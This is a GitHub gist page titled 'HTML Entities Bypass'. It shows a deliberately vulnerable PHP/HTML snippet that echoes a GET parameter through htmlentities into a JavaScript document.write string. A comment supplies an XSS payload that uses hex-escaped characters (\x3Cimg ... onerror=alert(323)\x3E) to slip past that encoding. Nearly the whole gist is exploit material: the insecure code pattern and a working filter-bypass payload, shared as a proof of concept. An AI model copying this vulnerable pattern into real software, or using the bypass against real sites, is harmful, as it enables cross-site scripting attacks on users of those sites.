Skip to content

Instantly share code, notes, and snippets.

@SaFiSec
Forked from starcoder017/HTMLEntitiesBypass.php
Created June 19, 2019 20:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save SaFiSec/3538129253a829fc1d0bfe0df0abe709 to your computer and use it in GitHub Desktop.
Save SaFiSec/3538129253a829fc1d0bfe0df0abe709 to your computer and use it in GitHub Desktop.
HTML Entities Bypass
<!DOCTYPE html>
<!-- Vulnerable Code-->
<html>
<body>
<script>
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>");
</script>
</body>
</html>
<!--Payload To Bypass XSS Filter
\x3Cimg%20src\x3Dx%20onerror\x3Dalert(323)\x3E
Credit: @Karel_Origin
-->
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment